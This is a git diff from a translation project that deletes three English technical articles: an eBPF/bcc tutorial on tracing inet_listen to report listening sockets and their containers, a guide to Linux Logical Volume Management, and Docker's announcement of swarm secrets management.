achieve the highest throughput and lowest latency. - -In an ideal world, we’d have some kernel interface telling us: - -> * “Hey Mr. ContainerManager, I’ve just created a socket for the Nginx-ware of container  _servestaticfiles_ , maybe you want to update your state?” -> -> * “Sure Mr. OS, Thanks for letting me know” - -While Linux has a wide range of interfaces to deal with events, up to 3 for file events, there is no dedicated interface to get socket event notifications. You can get routing table events, neighbor table events, conntrack events, interface change events. Just, not socket events. Or maybe there is, deep hidden in a Netlink interface. - -Ideally, we’d need a generic way to do it. How? - -### Kernel tracing and eBPF, a bit of history - -Until recently the only way was to patch the kernel or resort on SystemTap. [SytemTap][5] is a tracing Linux system. In a nutshell, it provides a DSL which is then compiled into a kernel module which is then live-loaded into the running kernel. Except that some production system disable dynamic module loading for security reasons. Including the one I was working on at that time. The other way would be to patch the kernel to trigger some events, probably based on netlink. This is not really convenient. Kernel hacking come with downsides including “interesting” new “features” and increased maintenance burden. - -Hopefully, starting with Linux 3.15 the ground was laid to safely transform any traceable kernel function into userland events. “Safely” is common computer science expression referring to “some virtual machine”. This case is no exception. Linux has had one for years. Since Linux 2.1.75 released in 1997 actually. It’s called Berkeley Packet Filter of BPF for short. As its name suggests, it was originally developed for the BSD firewalls. It had only 2 registers and only allowed forward jumps meaning that you could not write loops with it (Well, you can, if you know the maximum iterations and you manually unroll them). The point was to guarantee the program would always terminate and hence never hang the system. Still not sure if it has any use while you have iptables? It serves as the [foundation of CloudFlare’s AntiDDos protection][6]. - -OK, so, with Linux the 3.15, [BPF was extended][7] turning it into eBPF. For “extended” BPF. It upgrades from 2 32 bits registers to 10 64 bits 64 registers and adds backward jumping among others. It has then been [further extended in Linux 3.18][8] moving it out of the networking subsystem, and adding tools like maps. To preserve the safety guarantees, it [introduces a checker][9] which validates all memory accesses and possible code path. If the checker can’t guarantee the code will terminate within fixed boundaries, it will deny the initial insertion of the program. - -For more history, there is [an excellent Oracle presentation on eBPF][10]. - -Let’s get started. - -### Hello from from `inet_listen` - -As writing assembly is not the most convenient task, even for the best of us, we’ll use [bcc][11]. bcc is a collection of tools based on LLVM and Python abstracting the underlying machinery. Probes are written in C and the results can be exploited from python allowing to easily write non trivial applications. - -Start by install bcc. For some of these examples, you may require a recent (read >= 4.4) version of the kernel. If you are willing to actually try these examples, I highly recommend that you setup a VM.  _NOT_  a docker container. You can’t change the kernel in a container. As this is a young and dynamic projects, install instructions are highly platform/version dependant. You can find up to date instructions on [https://github.com/iovisor/bcc/blob/master/INSTALL.md][12] - -So, we want to get an event whenever a program starts to listen on TCP socket. When calling the `listen()` syscall on a `AF_INET` + `SOCK_STREAM` socket, the underlying kernel function is [`inet_listen`][13]. We’ll start by hooking a “Hello World” `kprobe` on it’s entrypoint. - -``` -from bcc import BPF - -# Hello BPF Program -bpf_text = """ -#include -#include - -// 1\. Attach kprobe to "inet_listen" -int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) -{ - bpf_trace_printk("Hello World!\\n"); - return 0; -}; -""" - -# 2\. Build and Inject program -b = BPF(text=bpf_text) - -# 3\. Print debug output -while True: - print b.trace_readline() - -``` - -This program does 3 things: 1\. It attaches a kernel probe to “inet_listen” using a naming convention. If the function was called, say, “my_probe”, it could be explicitly attached with `b.attach_kprobe("inet_listen", "my_probe"`. 2\. It builds the program using LLVM new BPF backend, inject the resulting bytecode using the (new) `bpf()` syscall and automatically attaches the probes matching the naming convention. 3\. It reads the raw output from the kernel pipe. - -Note: eBPF backend of LLVM is still young. If you think you’ve hit a bug, you may want to upgrade. - -Noticed the `bpf_trace_printk` call? This is a stripped down version of the kernel’s `printk()`debug function. When used, it produces tracing informations to a special kernel pipe in `/sys/kernel/debug/tracing/trace_pipe`. As the name implies, this is a pipe. If multiple readers are consuming it, only 1 will get a given line. This makes it unsuitable for production. - -Fortunately, Linux 3.19 introduced maps for message passing and Linux 4.4 brings arbitrary perf events support. I’ll demo the perf event based approach later in this post. - -``` -# From a first console -ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py - nc-4940 [000] d... 22666.991714: : Hello World! - -# From a second console -ubuntu@bcc:~$ nc -l 0 4242 -^C - -``` - -Yay! - -### Grab the backlog - -Now, let’s print some easily accessible data. Say the “backlog”. The backlog is the number of pending established TCP connections, pending to be `accept()`ed. - -Just tweak a bit the `bpf_trace_printk`: - -``` -bpf_trace_printk("Listening with with up to %d pending connections!\\n", backlog); - -``` - -If you re-run the example with this world-changing improvement, you should see something like: - -``` -(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py - nc-5020 [000] d... 25497.154070: : Listening with with up to 1 pending connections! - -``` - -`nc` is a single connection program, hence the backlog of 1\. Nginx or Redis would output 128 here. But that’s another story. - -Easy hue? Now let’s get the port. - -### Grab the port and IP - -Studying `inet_listen` source from the kernel, we know that we need to get the `inet_sock` from the `socket` object. Just copy from the sources, and insert at the beginning of the tracer: - -``` -// cast types. Intermediate cast not needed, kept for readability -struct sock *sk = sock->sk; -struct inet_sock *inet = inet_sk(sk); - -``` - -The port can now be accessed from `inet->inet_sport` in network byte order (aka: Big Endian). Easy! So, we could just replace the `bpf_trace_printk` with: - -``` -bpf_trace_printk("Listening on port %d!\\n", inet->inet_sport); - -``` - -Then run: - -``` -ubuntu@bcc:~/dev/listen-evts$ sudo /python tcv4listen.py -... -R1 invalid mem access 'inv' -... -Exception: Failed to load BPF program kprobe__inet_listen - -``` - -Except that it’s not (yet) so simple. Bcc is improving a  _lot_  currently. While writing this post, a couple of pitfalls had already been addressed. But not yet all. This Error means the in-kernel checker could prove the memory accesses in program are correct. See the explicit cast. We need to help is a little by making the accesses more explicit. We’ll use `bpf_probe_read` trusted function to read an arbitrary memory location while guaranteeing all necessary checks are done with something like: - -``` -// Explicit initialization. The "=0" part is needed to "give life" to the variable on the stack -u16 lport = 0; - -// Explicit arbitrary memory access. Read it: -// Read into 'lport', 'sizeof(lport)' bytes from 'inet->inet_sport' memory location -bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); - -``` - -Reading the bound address for IPv4 is basically the same, using `inet->inet_rcv_saddr`. If we put is all together, we should get the backlog, the port and the bound IP: - -``` -from bcc import BPF - -# BPF Program -bpf_text = """ -#include -#include -#include - -// Send an event for each IPv4 listen with PID, bound address and port -int kprobe__inet_listen(struct pt_regs *ctx, struct socket *sock, int backlog) -{ - // Cast types. Intermediate cast not needed, kept for readability - struct sock *sk = sock->sk; - struct inet_sock *inet = inet_sk(sk); - - // Working values. You *need* to initialize them to give them "life" on the stack and use them afterward - u32 laddr = 0; - u16 lport = 0; - - // Pull in details. As 'inet_sk' is internally a type cast, we need to use 'bpf_probe_read' - // read: load into 'laddr' 'sizeof(laddr)' bytes from address 'inet->inet_rcv_saddr' - bpf_probe_read(&laddr, sizeof(laddr), &(inet->inet_rcv_saddr)); - bpf_probe_read(&lport, sizeof(lport), &(inet->inet_sport)); - - // Push event - bpf_trace_printk("Listening on %x %d with %d pending connections\\n", ntohl(laddr), ntohs(lport), backlog); - return 0; -}; -""" - -# Build and Inject BPF -b = BPF(text=bpf_text) - -# Print debug output -while True: - print b.trace_readline() - -``` - -A test run should output something like: - -``` -(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py - nc-5024 [000] d... 25821.166286: : Listening on 7f000001 4242 with 1 pending connections - -``` - -Provided that you listen on localhost. The address is displayed as hex here to avoid dealing with the IP pretty printing but that’s all wired. And that’s cool. - -Note: you may wonder why `ntohs` and `ntohl` can be called from BPF while they are not trusted. This is because they are macros and inline functions from “.h” files and a small bug was [fixed][14]while writing this post. - -All done, one more piece: We want to get the related container. In the context of networking, that’s means we want the network namespace. The network namespace being the building block of containers allowing them to have isolated networks. - -### Grab the network namespace: a forced introduction to perf events - -On the userland, the network namespace can be determined by checking the target of `/proc/PID/ns/net`. It should look like `net:[4026531957]`. The number between brackets is the inode number of the network namespace. This said, we could grab it by scrapping ‘/proc’ but this is racy, we may be dealing with short-lived processes. And races are never good. We’ll grab the inode number directly from the kernel. Fortunately, that’s an easy one: - -``` -// Create an populate the variable -u32 netns = 0; - -// Read the netns inode number, like /proc does -netns = sk->__sk_common.skc_net.net->ns.inum; - -``` - -Easy. And it works. - -But if you’ve read so far, you may guess there is something wrong somewhere. And there is: - -``` -bpf_trace_printk("Listening on %x %d with %d pending connections in container %d\\n", ntohl(laddr), ntohs(lport), backlog, netns); - -``` - -If you try to run it, you’ll get some cryptic error message: - -``` -(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py -error: in function kprobe__inet_listen i32 (%struct.pt_regs*, %struct.socket*, i32) -too many args to 0x1ba9108: i64 = Constant<6> - -``` - -What clang is trying to tell you is “Hey pal, `bpf_trace_printk` can only take 4 arguments, you’ve just used 5.“. I won’t dive into the details here, but that’s a BPF limitation. If you want to dig it, [here is a good starting point][15]. - -The only way to fix it is to… stop debugging and make it production ready. So let’s get started (and make sure run at least Linux 4.4). We’ll use perf events which supports passing arbitrary sized structures to userland. Additionally, only our reader will get it so that multiple unrelated eBPF programs can produce data concurrently without issues. - -To use it, we need to: - -1. define a structure - -2. declare the event - -3. push the event - -4. re-declare the event on Python’s side (This step should go away in the future) - -5. consume and format the event - -This may seem like a lot, but it ain’t. See: - -``` -// At the begining of the C program, declare our event -struct listen_evt_t { - u64 laddr; - u64 lport; - u64 netns; - u64 backlog; -}; -BPF_PERF_OUTPUT(listen_evt); - -// In kprobe__inet_listen, replace the printk with -struct listen_evt_t evt = { - .laddr = ntohl(laddr), - .lport = ntohs(lport), - .netns = netns, - .backlog = backlog, -}; -listen_evt.perf_submit(ctx, &evt, sizeof(evt)); - -``` - -Python side will require a little more work, though: - -``` -# We need ctypes to parse the event structure -import ctypes - -# Declare data format -class ListenEvt(ctypes.Structure): - _fields_ = [ - ("laddr", ctypes.c_ulonglong), - ("lport", ctypes.c_ulonglong), - ("netns", ctypes.c_ulonglong), - ("backlog", ctypes.c_ulonglong), - ] - -# Declare event printer -def print_event(cpu, data, size): - event = ctypes.cast(data, ctypes.POINTER(ListenEvt)).contents - print("Listening on %x %d with %d pending connections in container %d" % ( - event.laddr, - event.lport, - event.backlog, - event.netns, - )) - -# Replace the event loop -b["listen_evt"].open_perf_buffer(print_event) -while True: - b.kprobe_poll() - -``` - -Give it a try. In this example, I have a redis running in a docker container and nc on the host: - -``` -(bcc)ubuntu@bcc:~/dev/listen-evts$ sudo python tcv4listen.py -Listening on 0 6379 with 128 pending connections in container 4026532165 -Listening on 0 6379 with 128 pending connections in container 4026532165 -Listening on 7f000001 6588 with 1 pending connections in container 4026531957 - -``` - -### Last word - -Absolutely everything is now setup to use trigger events from arbitrary function calls in the kernel using eBPF, and you should have seen most of the common pitfalls I hit while learning eBPF. If you want to see the full version of this tool, along with some more tricks like IPv6 support, have a look at [https://github.com/iovisor/bcc/blob/master/tools/solisten.py][16]. It’s now an official tool, thanks to the support of the bcc team. - -To go further, you may want to checkout Brendan Gregg’s blog, in particular [the post about eBPF maps and statistics][17]. He his one of the project’s main contributor. - - --------------------------------------------------------------------------------- - -via: https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/ - -作者:[Jean-Tiare Le Bigot ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.yadutaf.fr/about -[1]:https://blog.yadutaf.fr/tags/linux -[2]:https://blog.yadutaf.fr/tags/tracing -[3]:https://blog.yadutaf.fr/tags/ebpf -[4]:https://blog.yadutaf.fr/tags/bcc -[5]:https://en.wikipedia.org/wiki/SystemTap -[6]:https://blog.cloudflare.com/bpf-the-forgotten-bytecode/ -[7]:https://blog.yadutaf.fr/2016/03/30/turn-any-syscall-into-event-introducing-ebpf-kernel-probes/TODO -[8]:https://lwn.net/Articles/604043/ -[9]:http://lxr.free-electrons.com/source/kernel/bpf/verifier.c#L21 -[10]:http://events.linuxfoundation.org/sites/events/files/slides/tracing-linux-ezannoni-linuxcon-ja-2015_0.pdf -[11]:https://github.com/iovisor/bcc -[12]:https://github.com/iovisor/bcc/blob/master/INSTALL.md -[13]:http://lxr.free-electrons.com/source/net/ipv4/af_inet.c#L194 -[14]:https://github.com/iovisor/bcc/pull/453 -[15]:http://lxr.free-electrons.com/source/kernel/trace/bpf_trace.c#L86 -[16]:https://github.com/iovisor/bcc/blob/master/tools/solisten.py -[17]:http://www.brendangregg.com/blog/2015-05-15/ebpf-one-small-step.html diff --git a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md b/sources/tech/20160922 A Linux users guide to Logical Volume Management.md deleted file mode 100644 index ff0e390f38..0000000000 --- a/sources/tech/20160922 A Linux users guide to Logical Volume Management.md +++ /dev/null @@ -1,233 +0,0 @@ -A Linux user's guide to Logical Volume Management -============================================================ - -![Logical Volume Management (LVM)](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003499_01_other11x_cc.png?itok=I_kCDYj0 "Logical Volume Management (LVM)") -Image by : opensource.com - -Managing disk space has always been a significant task for sysadmins. Running out of disk space used to be the start of a long and complex series of tasks to increase the space available to a disk partition. It also required taking the system off-line. This usually involved installing a new hard drive, booting to recovery or single-user mode, creating a partition and a filesystem on the new hard drive, using temporary mount points to move the data from the too-small filesystem to the new, larger one, changing the content of the /etc/fstab file to reflect the correct device name for the new partition, and rebooting to remount the new filesystem on the correct mount point. - -I have to tell you that, when LVM (Logical Volume Manager) first made its appearance in Fedora Linux, I resisted it rather strongly. My initial reaction was that I did not need this additional layer of abstraction between me and the hard drives. It turns out that I was wrong, and that logical volume management is very useful. - -LVM allows for very flexible disk space management. It provides features like the ability to add disk space to a logical volume and its filesystem while that filesystem is mounted and active and it allows for the collection of multiple physical hard drives and partitions into a single volume group which can then be divided into logical volumes. - -The volume manager also allows reducing the amount of disk space allocated to a logical volume, but there are a couple requirements. First, the volume must be unmounted. Second, the filesystem itself must be reduced in size before the volume on which it resides can be reduced. - -It is important to note that the filesystem itself must allow resizing for this feature to work. The EXT2, 3, and 4 filesystems all allow both offline (unmounted) and online (mounted) resizing when increasing the size of a filesystem, and offline resizing when reducing the size. You should check the details of the filesystems you intend to use in order to verify whether they can be resized at all and especially whether they can be resized while online. - -### Expanding a filesystem on the fly - -I always like to run new distributions in a VirtualBox virtual machine for a few days or weeks to ensure that I will not run into any devastating problems when I start installing it on my production machines. One morning a couple years ago I started installing a newly released version of Fedora in a virtual machine on my primary workstation. I thought that I had enough disk space allocated to the host filesystem in which the VM was being installed. I did not. About a third of the way through the installation I ran out of space on that filesystem. Fortunately, VirtualBox detected the out-of-space condition and paused the virtual machine, and even displayed an error message indicating the exact cause of the problem. - -Note that this problem was not due to the fact that the virtual disk was too small, it was rather the logical volume on the host computer that was running out of space so that the virtual disk belonging to the virtual machine did not have enough space to expand on the host's logical volume. - -Since most modern distributions use Logical Volume Management by default, and I had some free space available on the volume group, I was able to assign additional disk space to the appropriate logical volume and then expand filesystem of the host on the fly. This means that I did not have to reformat the entire hard drive and reinstall the operating system or even reboot. I simply assigned some of the available space to the appropriate logical volume and resized the filesystem—all while the filesystem was on-line and the running program, The virtual machine was still using the host filesystem. After resizing the logical volume and the filesystem I resumed running the virtual machine and the installation continued as if no problems had occurred. - -Although this type of problem may never have happened to you, running out of disk space while a critical program is running has happened to many people. And while many programs, especially Windows programs, are not as well written and resilient as VirtualBox, Linux Logical Volume Management made it possible to recover without losing any data and without having to restart the time-consuming installation. - -### LVM Structure - -The structure of a Logical Volume Manager disk environment is illustrated by Figure 1, below. Logical Volume Management enables the combining of multiple individual hard drives and/or disk partitions into a single volume group (VG). That volume group can then be subdivided into logical volumes (LV) or used as a single large volume. Regular file systems, such as EXT3 or EXT4, can then be created on a logical volume. - -In Figure 1, two complete physical hard drives and one partition from a third hard drive have been combined into a single volume group. Two logical volumes have been created from the space in the volume group, and a filesystem, such as an EXT3 or EXT4 filesystem has been created on each of the two logical volumes. - -![lvm.png](https://opensource.com/sites/default/files/resize/images/life-uploads/lvm-520x222.png) - - _Figure 1: LVM allows combining partitions and entire hard drives into Volume Groups._ - -Adding disk space to a host is fairly straightforward but, in my experience, is done relatively infrequently. The basic steps needed are listed below. You can either create an entirely new volume group or you can add the new space to an existing volume group and either expand an existing logical volume or create a new one. - -### Adding a new logical volume - -There are times when it is necessary to add a new logical volume to a host. For example, after noticing that the directory containing virtual disks for my VirtualBox virtual machines was filling up the /home filesystem, I decided to create a new logical volume in which to store the virtual machine data, including the virtual disks. This would free up a great deal of space in my /home filesystem and also allow me to manage the disk space for the VMs independently. - -The basic steps for adding a new logical volume are as follows. - -1. If necessary, install a new hard drive. - -2. Optional: Create a partition on the hard drive. - -3. Create a physical volume (PV) of the complete hard drive or a partition on the hard drive. - -4. Assign the new physical volume to an existing volume group (VG) or create a new volume group. - -5. Create a new logical volumes (LV) from the space in the volume group. - -6. Create a filesystem on the new logical volume. - -7. Add appropriate entries to /etc/fstab for mounting the filesystem. - -8. Mount the filesystem. - -Now for the details. The following sequence is taken from an example I used as a lab project when teaching about Linux filesystems. - -### Example - -This example shows how to use the CLI to extend an existing volume group to add more space to it, create a new logical volume in that space, and create a filesystem on the logical volume. This procedure can be performed on a running, mounted filesystem. - -WARNING: Only the EXT3 and EXT4 filesystems can be resized on the fly on a running, mounted filesystem. Many other filesystems including BTRFS and ZFS cannot be resized. - -### Install hard drive - -If there is not enough space in the volume group on the existing hard drive(s) in the system to add the desired amount of space it may be necessary to add a new hard drive and create the space to add to the Logical Volume. First, install the physical hard drive, and then perform the following steps. - -### Create Physical Volume from hard drive - -It is first necessary to create a new Physical Volume (PV). Use the command below, which assumes that the new hard drive is assigned as /dev/hdd. - -``` -pvcreate /dev/hdd -``` - -It is not necessary to create a partition of any kind on the new hard drive. This creation of the Physical Volume which will be recognized by the Logical Volume Manager can be performed on a newly installed raw disk or on a Linux partition of type 83\. If you are going to use the entire hard drive, creating a partition first does not offer any particular advantages and uses disk space for metadata that could otherwise be used as part of the PV. - -### Extend the existing Volume Group - -In this example we will extend an existing volume group rather than creating a new one; you can choose to do it either way. After the Physical Volume has been created, extend the existing Volume Group (VG) to include the space on the new PV. In this example the existing Volume Group is named MyVG01. - -``` -vgextend /dev/MyVG01 /dev/hdd -``` - -### Create the Logical Volume - -First create the Logical Volume (LV) from existing free space within the Volume Group. The command below creates a LV with a size of 50GB. The Volume Group name is MyVG01 and the Logical Volume Name is Stuff. - -``` -lvcreate -L +50G --name Stuff MyVG01 -``` - -### Create the filesystem - -Creating the Logical Volume does not create the filesystem. That task must be performed separately. The command below creates an EXT4 filesystem that fits the newly created Logical Volume. - -``` -mkfs -t ext4 /dev/MyVG01/Stuff -``` - -### Add a filesystem label - -Adding a filesystem label makes it easy to identify the filesystem later in case of a crash or other disk related problems. - -``` -e2label /dev/MyVG01/Stuff Stuff -``` - -### Mount the filesystem - -At this point you can create a mount point, add an appropriate entry to the /etc/fstab file, and mount the filesystem. - -You should also check to verify the volume has been created correctly. You can use the **df**, **lvs,** and **vgs** commands to do this. - -### Resizing a logical volume in an LVM filesystem - -The need to resize a filesystem has been around since the beginning of the first versions of Unix and has not gone away with Linux. It has gotten easier, however, with Logical Volume Management. - -1. If necessary, install a new hard drive. - -2. Optional: Create a partition on the hard drive. - -3. Create a physical volume (PV) of the complete hard drive or a partition on the hard drive. - -4. Assign the new physical volume to an existing volume group (VG) or create a new volume group. - -5. Create one or more logical volumes (LV) from the space in the volume group, or expand an existing logical volume with some or all of the new space in the volume group. - -6. If you created a new logical volume, create a filesystem on it. If adding space to an existing logical volume, use the resize2fs command to enlarge the filesystem to fill the space in the logical volume. - -7. Add appropriate entries to /etc/fstab for mounting the filesystem. - -8. Mount the filesystem. - -### Example - -This example describes how to resize an existing Logical Volume in an LVM environment using the CLI. It adds about 50GB of space to the /Stuff filesystem. This procedure can be used on a mounted, live filesystem only with the Linux 2.6 Kernel (and higher) and EXT3 and EXT4 filesystems. I do not recommend that you do so on any critical system, but it can be done and I have done so many times; even on the root (/) filesystem. Use your judgment. - -WARNING: Only the EXT3 and EXT4 filesystems can be resized on the fly on a running, mounted filesystem. Many other filesystems including BTRFS and ZFS cannot be resized. - -### Install the hard drive - -If there is not enough space on the existing hard drive(s) in the system to add the desired amount of space it may be necessary to add a new hard drive and create the space to add to the Logical Volume. First, install the physical hard drive and then perform the following steps. - -### Create a Physical Volume from the hard drive - -It is first necessary to create a new Physical Volume (PV). Use the command below, which assumes that the new hard drive is assigned as /dev/hdd. - -``` -pvcreate /dev/hdd -``` - -It is not necessary to create a partition of any kind on the new hard drive. This creation of the Physical Volume which will be recognized by the Logical Volume Manager can be performed on a newly installed raw disk or on a Linux partition of type 83\. If you are going to use the entire hard drive, creating a partition first does not offer any particular advantages and uses disk space for metadata that could otherwise be used as part of the PV. - -### Add PV to existing Volume Group - -For this example, we will use the new PV to extend an existing Volume Group. After the Physical Volume has been created, extend the existing Volume Group (VG) to include the space on the new PV. In this example, the existing Volume Group is named MyVG01. - -``` -vgextend /dev/MyVG01 /dev/hdd -``` - -### Extend the Logical Volume - -Extend the Logical Volume (LV) from existing free space within the Volume Group. The command below expands the LV by 50GB. The Volume Group name is MyVG01 and the Logical Volume Name is Stuff. - -``` -lvextend -L +50G /dev/MyVG01/Stuff -``` - -### Expand the filesystem - -Extending the Logical Volume will also expand the filesystem if you use the -r option. If you do not use the -r option, that task must be performed separately. The command below resizes the filesystem to fit the newly resized Logical Volume. - -``` -resize2fs /dev/MyVG01/Stuff -``` - -You should check to verify the resizing has been performed correctly. You can use the **df**, **lvs,** and **vgs** commands to do this. - -### Tips - -Over the years I have learned a few things that can make logical volume management even easier than it already is. Hopefully these tips can prove of some value to you. - -* Use the Extended file systems unless you have a clear reason to use another filesystem. Not all filesystems support resizing but EXT2, 3, and 4 do. The EXT filesystems are also very fast and efficient. In any event, they can be tuned by a knowledgeable sysadmin to meet the needs of most environments if the defaults tuning parameters do not. - -* Use meaningful volume and volume group names. - -* Use EXT filesystem labels. - -I know that, like me, many sysadmins have resisted the change to Logical Volume Management. I hope that this article will encourage you to at least try LVM. I am really glad that I did; my disk management tasks are much easier since I made the switch. - - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][10] - - David Both - David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981\. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. David has written articles for... [more about David Both][7][More about me][8] - --------------------------------------------------------------------------------- - -via: https://opensource.com/business/16/9/linux-users-guide-lvm - -作者:[ David Both][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/dboth -[1]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[2]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[3]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[4]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[5]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent -[6]:https://opensource.com/business/16/9/linux-users-guide-lvm?rate=79vf1js7A7rlp-I96YFneopUQqsa2SuB-g-og7eiF1U -[7]:https://opensource.com/users/dboth -[8]:https://opensource.com/users/dboth -[9]:https://opensource.com/user/14106/feed -[10]:https://opensource.com/users/dboth -[11]:https://opensource.com/users/dboth -[12]:https://opensource.com/users/dboth -[13]:https://opensource.com/business/16/9/linux-users-guide-lvm#comments -[14]:https://opensource.com/tags/business -[15]:https://opensource.com/tags/linux -[16]:https://opensource.com/tags/how-tos-and-tutorials -[17]:https://opensource.com/tags/sysadmin diff --git a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md b/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md deleted file mode 100644 index a3fc2c886e..0000000000 --- a/sources/tech/20170209 INTRODUCING DOCKER SECRETS MANAGEMENT.md +++ /dev/null @@ -1,110 +0,0 @@ -INTRODUCING DOCKER SECRETS MANAGEMENT -============================================================ - -Containers are changing how we view apps and infrastructure. Whether the code inside containers is big or small, container architecture introduces a change to how that code behaves with hardware – it fundamentally abstracts it from the infrastructure. Docker believes that there are three key components to container security and together they result in inherently safer apps. - - ![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/e12387a1-ab21-4942-8760-5b1677bc656d-1.jpg?w=1140&ssl=1) - -A critical element of building safer apps is having a secure way of communicating with other apps and systems, something that often requires credentials, tokens, passwords and other types of confidential information—usually referred to as application secrets. We are excited to introduce Docker Secrets, a container native solution that strengthens the Trusted Delivery component of container security by integrating secret distribution directly into the container platform. - -With containers, applications are now dynamic and portable across multiple environments. This  made existing secrets distribution solutions inadequate because they were largely designed for static environments. Unfortunately, this led to an increase in mismanagement of application secrets, making it common to find insecure, home-grown solutions, such as embedding secrets into version control systems like GitHub, or other equally bad—bolted on point solutions as an afterthought. - -### Introducing Docker Secrets Management - -We fundamentally believe that apps are safer if there is a standardized interface for accessing secrets. Any good solution will also have to follow security best practices, such as encrypting secrets while in transit; encrypting secrets at rest; preventing secrets from unintentionally leaking when consumed by the final application; and strictly adhere to the principle of least-privilege, where an application only has access to the secrets that it needs—no more, no less. - -By integrating secrets into Docker orchestration, we are able to deliver a solution for the secrets management problem that follows these exact principles. - -The following diagram provides a high-level view of how the Docker swarm mode architecture is applied to securely deliver a new type of object to our containers: a secret object. - - ![Docker Secrets Management](https://i0.wp.com/blog.docker.com/wp-content/uploads/b69d2410-9e25-44d8-aa2d-f67b795ff5e3.jpg?w=1140&ssl=1) - -In Docker, a secret is any blob of data, such as a password, SSH private key, TLS Certificate, or any other piece of data that is sensitive in nature. When you add a secret to the swarm (by running `docker secret create`), Docker sends the secret over to the swarm manager over a mutually authenticated TLS connection, making use of the [built-in Certificate Authority][17] that gets automatically created when bootstrapping a new swarm. - -``` -$ echo "This is a secret" | docker secret create my_secret_data - -``` - -Once the secret reaches a manager node, it gets saved to the internal Raft store, which uses NACL’s Salsa20Poly1305 with a 256-bit key to ensure no data is ever written to disk unencrypted. Writing to the internal store gives secrets the same high availability guarantees that the the rest of the swarm management data gets. - -When a swarm manager starts up, the encrypted Raft logs containing the secrets is decrypted using a data encryption key that is unique per-node. This key, and the node’s TLS credentials used to communicate with the rest of the cluster, can be encrypted with a cluster-wide key encryption key, called the unlock key, which is also propagated using Raft and will be required on manager start. - -When you grant a newly-created or running service access to a secret, one of the manager nodes (only managers have access to all the stored secrets stored) will send it over the already established TLS connection exclusively to the nodes that will be running that specific service. This means that nodes cannot request the secrets themselves, and will only gain access to the secrets when provided to them by a manager – strictly for the services that require them. - -``` -$ docker service  create --name="redis" --secret="my_secret_data" redis:alpine -``` - -The  unencrypted secret is mounted into the container in an in-memory filesystem at /run/secrets/. - -``` -$ docker exec $(docker ps --filter name=redis -q) ls -l /run/secrets -total 4 --r--r--r--    1 root     root            17 Dec 13 22:48 my_secret_data -``` - -If a service gets deleted, or rescheduled somewhere else, the manager will immediately notify all the nodes that no longer require access to that secret to erase it from memory, and the node will no longer have any access to that application secret. - -``` -$ docker service update --secret-rm="my_secret_data" redis - -$ docker exec -it $(docker ps --filter name=redis -q) cat /run/secrets/my_secret_data - -cat: can't open '/run/secrets/my_secret_data': No such file or directory -``` - -Check out the [Docker secrets docs][18] for more information and examples on how to create and manage your secrets. And a special shout out to Laurens Van Houtven (https://www.lvh.io/[)][19] in collaboration with the Docker security and core engineering team to help make this feature a reality. - -[Get safer apps for dev and ops w/ new #Docker secrets management][5] - -[CLICK TO TWEET][6] - -### -![Docker Security](https://i2.wp.com/blog.docker.com/wp-content/uploads/Screenshot-2017-02-08-23.30.13.png?resize=1032%2C111&ssl=1) - -### Safer Apps with Docker - -Docker secrets is designed to be easily usable by developers and IT ops teams to build and run safer apps. Docker secrets is a container first architecture designed to keep secrets safe and used only when needed by the exact container that needs that secret to operate. From defining apps and secrets with Docker Compose through an IT admin deploying that Compose file directly in Docker Datacenter, the services, secrets, networks and volumes will travel securely, safely with the application. - -Resources to learn more: - -* [Docker Datacenter on 1.13 with Secrets, Security Scanning, Content Cache and More][7] - -* [Download Docker][8] and get started today - -* [Try secrets in Docker Datacenter][9] - -* [Read the Documentation][10] - -* Attend an [upcoming webinar][11] - --------------------------------------------------------------------------------- - -via: https://blog.docker.com/2017/02/docker-secrets-management/ - -作者:[ Ying Li][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://blog.docker.com/author/yingli/ 